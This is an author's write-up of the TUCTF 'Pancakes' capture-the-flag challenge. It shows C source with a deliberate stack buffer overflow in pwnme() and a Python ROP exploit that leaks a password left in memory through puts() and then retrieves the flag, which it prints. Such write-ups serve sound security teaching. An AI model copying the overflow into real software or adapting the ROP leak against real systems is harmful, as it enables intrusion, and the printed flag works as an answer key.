# Pancakes Author Writeup

## Description

You ever just get a craving for pancakes?

*Hint:* Where is the flag when it's read?

## A Word From The Author

This challenge is based on malware (specifically WannaCRY if I remember correctly). I always thought it was hilarious when WannaCRY would leave the key used to encrypt the filesystem in memory. Tools like mimikatz could be used to dump the key and decrypt the filesystem, if the affected machine wasn't power cycled. This challenge isn't revolutionary, but I enjoy the idea that you can fail a password check, but the password can still be stuck in memory as per this challenge.

Also the challenge name *pancakes* is not a hint and has nothing to do with pwning. I was writing some challenges pretty late and had a strong craving for some pancakes. Couldn't get my mind off of em. I'm happy to say we got some pancakes after I finished the challenge.

## Information Gathering

``` c
#include <stdio.h>  // prints
#include <stdlib.h> // malloc
#include <string.h> // strcmp
#include <unistd.h> // read
#include <fcntl.h>  // open
#include <unistd.h> // close
#include <time.h>   // time

char password[32];
#define PASS_LEN 26
#define FLAG_LEN 75

void readPassword() {
	int fd = open("./password.txt", 0);
	read(fd, password, PASS_LEN);
	close(fd);
}

void printFlag(char *buf) {
	int fd = open("flag.txt", 0);
	char pbuff[FLAG_LEN+1];
	memset(pbuff, 0, FLAG_LEN+1);

	// Reads the password into .data
	readPassword();

	//if (!strcmp(buf, password)) {
	if (!memcmp(buf, password, PASS_LEN)) {
		read(fd, pbuff, FLAG_LEN);
		printf("%s\n", pbuff);
	} else {
		puts("Try harder");
	}

	close(fd);
}

void pwnme() {
	printf("Enter pancake password\n> ");
	char buf[32];
	read(0, buf, 64);

	printFlag(buf);

}

int main() {
    setvbuf(stdout, NULL, _IONBF, 20);
    setvbuf(stdin, NULL, _IONBF, 20);

	pwnme();

    return 0;
}
```

From the C code we can see that the program reads from a password file and compares that against your input. The *printFlag()* function is the standard for pwn challenges where there is a check halfway through the operations required to print the flag to prevent a ROP before or after it. Like I stated earlier, if we look closer at the C code we can see that the program doesn't clear the buffer the password is read into after a failed check which means if we can get control over execution then we can probably leak that value off. *pwnme()* has a pretty clear buffer overflow, so this is that flow I'm thinking:

1. Overflow return address in pwnme()
2. Fail password check
3. ROP to puts() and leak off password buffer (b/c no PIE)
4. return to main() and re-execute the entire challenge with the new found password


## Exploitation

``` python
#!/usr/bin/env python
from thpoonpwn import *

elf,libc,args = pwninit(
    remcmd =    'chal.tuctf.com 30503',
    localcmd =  './pancakes',
#    libcid =    '',
#    libcfile =  './',
    local =     True,
#    pause =     True,
#    copy =      True,
#    ldpreload = True,
#    debug=True
)
p = pwnstart(args)
#___________________________________________________________________________________________________
p.recv()
pad = 44

# ROPs
putsPLT =   flat(elf.plt['puts'])
main =      flat(elf.sym['main'])
# password buffer in .data
password =  flat(elf.sym['password'])

# Leak the password
payload = ''
payload += 'A'*pad
payload += putsPLT
payload += main
payload += password

p.sendline(payload)

# Get leaked password
p.recvuntil("Try harder\n")
password = p.recv(26)

# 2nd run, just send password
payload = ''
payload += password
payload += flat(0)

p.sendline(payload)
p.recvuntil("> ")
print p.recv()

#___________________________________________________________________________________________________
pwnend(p, args)
```

![pwn.png](./res/768468b28cea4cb59493064d610e2ff5.png)

## Endgame

Cute little challenge that makes me smile. Happy pwning!

> **flag:** TUCTF{p4nc4k35_4r3_4b50lu73ly_d3l1c10u5_4nd_y0u_5h0uld_637_50m3_4f73r_7h15}

